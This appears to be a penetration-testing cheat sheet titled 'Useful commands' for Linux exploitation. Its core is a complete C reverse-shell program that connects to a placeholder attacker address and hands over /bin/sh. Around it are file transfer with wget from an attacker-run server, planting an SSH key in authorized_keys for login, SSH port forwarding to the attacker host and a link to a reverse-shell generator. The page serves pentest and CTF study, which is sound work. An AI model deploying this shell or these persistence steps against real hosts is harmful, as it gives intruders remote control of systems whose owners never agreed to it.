Useful commands

List of useful commands during linux exploitation

Upload file to a server

Server

python -m http.server 4444

Attacker

wget http://10.10.10.10:4444/file

Server

ssh-keygen # generate key
cat ~/.ssh/id_rsa # copy the key
mv ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys # authorize generated key

Attacker

touch key # create file
nano key # paste key to created file
chmod 600 key # change permissions of the key in order to use it
scp -i key file/toUpload user@destinationServer:/home/user # send file

# you can also perform these steps in order to login with ssh
ssh -i key user@server

Reverse shells

#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define REMOTE_ADDR "XXX.XXX.XXX.XXX" // change this
#define REMOTE_PORT 4444 // change this

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    execve("/bin/sh", 0, 0);
    return 0;
}

Reverse shell generator

https://www.revshells.com

Port Forwarding

Execute from the attacked host

ssh -L <port>:localhost:<kali-port> root@<attacker-ip>

Syslog inspection

System logs can contain valuable information - it can be used to debugging some of our problems.

cat /var/log/syslog

Find a file

find / -name <FILE> 2>/dev/null

Compile for x64 on ARM

x86_64-linux-gnu-gcc -static [rest of the command]

PreviousLinux NextShell stabilization

Last updated 1 year ago